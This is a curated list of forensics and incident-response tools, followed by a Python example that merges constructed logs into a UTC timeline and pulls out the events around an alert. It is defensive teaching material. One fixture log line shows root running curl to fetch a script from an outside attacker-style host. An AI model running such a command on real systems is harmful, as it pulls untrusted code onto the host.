Automating incident response: scalable & fast, within minutes

Incident Response
GitHub - log2timeline/plaso: Super timeline all the things
GitHub - fox-it/dissect: Dissect is a digital forensics & incident response framework and toolset that allows you to quickly access and analyse forensic artefacts from various disk and file formats, developed by Fox-IT (part of NCC Group).
Event Log Viewer for Windows 11 / 10 / 8 / 7 / Vista
Simple tool for Windows 11/10/8/7/Vista that displays in a table the details of all events from the event logs of Windows, including the event description
MDwiki
SDB Explorer, MFTExplorer, Registry Explorer, Timeline Explorer, etc.
Advanced Linux detection and forensics cheatsheet by Defensive Security
OpenRelik
OpenRelik is an open-source (Apache-2.0) platform designed to streamline collaborative digital forensic investigations. It combines modular workflows for custom investigative processes, an intuitive interface for workflow management, real-time collaboration features, and a centralized repository for shared artifacts. The platform is easy to extend with new workers to adapt to evolving forensic needs.
The Key to Identify PsExec - AboutDFIR - The Definitive Compendium Project
In one way or another, PsExec, a wildly popular remote administration tool in the Microsoft Sysinternals Suite, peeks its head in the wild. Threat actors tend to leverage PsExec for various reasons, such as executing programs on a remote host in a victim's environment or, for more nefarious reasons, deploying ransomware. The focus of this blog is to bring attention to a relatively new method of identifying the source host from which PsExec was executed. This is something that has caught my attention on a few IR engagements that I have worked on recently. Huge shoutout to Joseph Ziemba for first bringing this to my attention on one of our ransomware engagements we worked on together at KPMG.
tclahr/uac: UAC is a Live Response collection script for Incident Response that makes use of native binaries and tools to automate the collection of AIX, Android, ESXi, FreeBSD, Linux, macOS, NetBSD, NetScaler, OpenBSD and Solaris systems artifacts.
Hunting Keywords
Hypothesis-Driven Hunting with the PEAK Framework
Details on hypothesis-driven threat hunting with the PEAK framework.
The RULER Project
The Really Useful Logging and Event Repository Project
0x4D31/awesome-threat-detection
✨ A curated list of awesome threat detection and hunting resources 🕵️♂️
UncoderIO/Uncoder_IO: An IDE and translation engine for detection engineers and threat hunters. Be faster, write smarter, keep 100% privacy.
google/grr
GRR Rapid Response: remote live forensics for incident response
Yamato-Security/hayabusa: Hayabusa (隼) is a sigma-based threat hunting and fast forensics timeline generator for Windows event logs.
jtmoon79/super-speedy-syslog-searcher
Speedily search and merge log messages by datetime
LetsDefend/incident-response-playbooks
ufrisk/MemProcFS: MemProcFS
dfir-dd/dfir-toolkit
CLI tools for forensic investigation of Windows artifacts
0x4D31/detection-and-response-pipeline: ✨ A compilation of suggested tools/services for each component in a detection and response pipeline, along with real-world examples. The purpose is to create a reference hub for designing effective threat detection and response pipelines. 👷 🏗
GitHub - cugu/awesome-forensics: A curated list of awesome forensic analysis tools and resources
Linux Forensics
Everything related to Linux Forensics
GitHub - meirwah/awesome-incident-response: A curated list of tools for incident response
DFIR triage and Timeline Analysis
During incident response, it is essential to establish a full context around the time of alert or when suspicious activity was identified…
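The two entries above (merging log messages by datetime, and establishing full context around the time of an alert) describe the same technique that tools like plaso, Hayabusa and super-speedy-syslog-searcher automate at scale: normalise every source to one clock, merge-sort, then cut the window around the alert. The script below is an added example written for this page; it is not code from any of the listed projects. Its log lines are constructed (documentation IP ranges, made-up hostnames), the Windows CSV column order is an invented export layout, and the year and UTC zone applied to the BSD-syslog lines are analyst assumptions, because classic syslog carries neither. The access-log line deliberately carries a "+0100" offset so the example shows why zone normalisation matters: read naively, it would fall inside the window; converted to UTC, it does not.

```python
"""Minimal super timeline: normalise three log formats to UTC, merge, and pull the window around an alert."""
import re
from datetime import datetime, timedelta, timezone

# Constructed sample lines (not real evidence). Timestamps deliberately mix formats and zones:
# BSD syslog has no year or zone, the Windows CSV is ISO-8601 "Z", the access log carries "+0100".
SYSLOG_LINES = [
    "Mar 14 09:58:01 web01 sshd[2211]: Accepted password for deploy from 203.0.113.7 port 51522 ssh2",
    "Mar 14 10:03:45 web01 sudo: deploy : TTY=pts/0 ; PWD=/home/deploy ; USER=root ; COMMAND=/usr/bin/curl http://198.51.100.9/x.sh",
    "Mar 14 11:30:00 web01 CRON[3001]: (root) CMD (run-parts /etc/cron.hourly)",
]
# Assumed (invented) column order: ts,host,event_id,description,user,src_ip
WINEVT_CSV_LINES = [
    "2024-03-14T10:01:12Z,DC01,4624,Logon,deploy,203.0.113.7",
    "2024-03-14T10:04:10Z,FS01,7045,Service installed,PSEXESVC,",
]
ACCESS_LOG_LINES = [
    '198.51.100.9 - - [14/Mar/2024:10:02:30 +0100] "GET /x.sh HTTP/1.1" 200 512',
]

SYSLOG_RE = re.compile(
    r"^(?P<mon>[A-Z][a-z]{2}) +(?P<day>\d{1,2}) (?P<time>\d{2}:\d{2}:\d{2}) (?P<host>\S+) (?P<msg>.*)$"
)
ACCESS_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<req>[^"]*)" (?P<status>\d{3}) (?P<size>\d+)'
)


def parse_syslog(line, year=2024, tz=timezone.utc):
    """BSD syslog carries no year and no zone; both are assumptions the analyst supplies."""
    m = SYSLOG_RE.match(line)
    if not m:
        return None
    when = datetime.strptime(f"{year} {m['mon']} {m['day']} {m['time']}", "%Y %b %d %H:%M:%S")
    return {"ts": when.replace(tzinfo=tz), "source": "syslog", "host": m["host"], "msg": m["msg"]}


def parse_winevt_csv(line):
    """Constructed CSV export; 'Z' is rewritten so fromisoformat works on older Pythons."""
    ts, host, eid, desc, user, src = line.split(",", 5)
    when = datetime.fromisoformat(ts.replace("Z", "+00:00"))
    msg = f"EventID {eid} {desc} user={user or '-'} src={src or '-'}"
    return {"ts": when, "source": "winevt", "host": host, "msg": msg}


def parse_access(line, host="web01"):
    """Combined access log; %z consumes the '+0100' offset, then we convert to UTC."""
    m = ACCESS_RE.match(line)
    if not m:
        return None
    when = datetime.strptime(m["ts"], "%d/%b/%Y:%H:%M:%S %z").astimezone(timezone.utc)
    msg = f"{m['ip']} \"{m['req']}\" {m['status']} {m['size']}"
    return {"ts": when, "source": "access", "host": host, "msg": msg}


def build_timeline():
    """Parse every source, drop unparseable lines, and merge-sort on the UTC timestamp."""
    events = []
    for parser, lines in ((parse_syslog, SYSLOG_LINES),
                          (parse_winevt_csv, WINEVT_CSV_LINES),
                          (parse_access, ACCESS_LOG_LINES)):
        for line in lines:
            ev = parser(line)
            if ev is not None:
                events.append(ev)
    events.sort(key=lambda e: e["ts"])  # stable sort keeps source order for equal timestamps
    return events


def window(timeline, alert_ts, minutes=5):
    """Events within +/- `minutes` of the alert, from all sources, in time order."""
    delta = timedelta(minutes=minutes)
    return [e for e in timeline if abs(e["ts"] - alert_ts) <= delta]


def render(ev):
    return f"{ev['ts'].isoformat()} {ev['source']:<7} {ev['host']:<6} {ev['msg']}"


if __name__ == "__main__":
    # The alert: sudo running curl against an external host (constructed).
    alert = datetime(2024, 3, 14, 10, 3, 45, tzinfo=timezone.utc)
    for ev in window(build_timeline(), alert):
        print(render(ev))
```

With a five-minute window the result is three events: the DC01 logon, the sudo/curl alert itself, and the PSEXESVC service install on FS01, which is exactly the cross-host context the blog excerpt above is after. The 09:58 SSH logon sits 5m44s before the alert and drops out, as does the access-log hit once its "+0100" offset is honoured; widen the window or pivot on the source IP to pull those back in.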